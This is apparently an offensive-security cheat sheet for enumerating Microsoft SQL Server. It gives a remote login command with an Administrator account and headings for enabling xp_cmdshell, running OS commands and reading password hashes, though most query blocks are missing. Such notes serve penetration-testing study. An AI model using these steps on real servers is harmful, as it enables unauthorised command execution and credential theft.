MSSQL

MSSQL (Microsoft SQL)

SQLCMD allows SQL queries to be run through the windows command prompt or even remotely from another machine.

Way to connect to MSSQL:

impacket-mssqlclient Administrator:[email protected] -windows-auth

breakdown:

Administrator:[email protected]
{username}   :{passwd}@{IP_addr}

check the version:

SELECT @@version;

When using a SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running the command remotely, we can omit the GO statement since it's not part of the MSSQL TDS protocol.

list of schema in database:

SELECT * FROM INFORMATION_SCHEMA.SCHEMATA;

list all available database:

master, tempdb, model, and msdb are default databases

To get a list of tables

To get table column names:

To get all the values from the table:

breakdown

Below is an expanded set of notes and useful queries for MSSQL enumeration and usage, including commonly used views, functions, and procedures. This should help fill in the gaps and provide a more comprehensive reference.

Connecting and Running Commands

Using sqlcmd Locally:

  • -S specifies the server name or IP (e.g., localhost or 192.168.50.18)

  • -U specifies the username

  • -P specifies the password

  • Within sqlcmd, end statements with a semicolon and use GO on a new line to execute. Example:

Using impacket-mssqlclient (Remote):

  • No need to use GO when running queries this way, as GO is a sqlcmd batch terminator and not part of the TDS protocol.

Basic Information and System Details

Check the Server Version:

Check Current User / Login:

Check the Current Database:

List All Available Databases:

Default system databases are usually: master, tempdb, model, and msdb.

Switch to a Specific Database:

Enumerating Schemas, Tables, and Columns

List All Schemas in the Current Database:

List All Tables in the Current Database:

List All Tables in Another Database:

List All Columns for a Specific Table:

If you need to qualify with a specific database and schema:

Select All Data From a Table:

Enumerating Users, Logins, and Roles

Enumerating Users, Logins, and Roles

List All Server-Level Principals (Logins):

List All Database Users:

List All Roles in the Current Database:

Check Permissions of the Current User:

System Stored Procedures and Functions

System Stored Procedures and Functions

Show All Databases (System Procedure):

Show Tables in the Current Database:

Get Detailed Info About a Specific Table:

Get Column Details for a Specific Table:

Find the Current Database Name (again, as a function):

Checking Active Connections and Sessions

Checking Active Connections and Sessions

View Current Sessions:

View Currently Running Queries:

Advanced Features

(Might Require Elevated Privileges)

Enable xp_cmdshell (if you have the right permissions):

Use xp_cmdshell to Run OS Commands (If Enabled):

Directory Enumeration Using xp_dirtree:

Other Useful System Views

  • sys.syslogins (deprecated, but sometimes still accessible) can show logins.

  • sys.sql_logins can show SQL logins with hashed passwords (in certain conditions).

  • sys.server_principals and sys.database_principals for detailed user and login info.

Notes on Authentication and Connections

  • Integrated Authentication / Windows Auth: If you have a valid domain user that can connect with Windows auth:

    The -E flag indicates trusted connection using current Windows credentials.

  • Port Changes: By default, SQL Server uses port 1433. If the instance is listening on a different port, specify it as -S <server>,<port> (e.g., sqlcmd -S 192.168.50.18,1433).

PreviousMySQLNextAuthentication Bypass

Last updated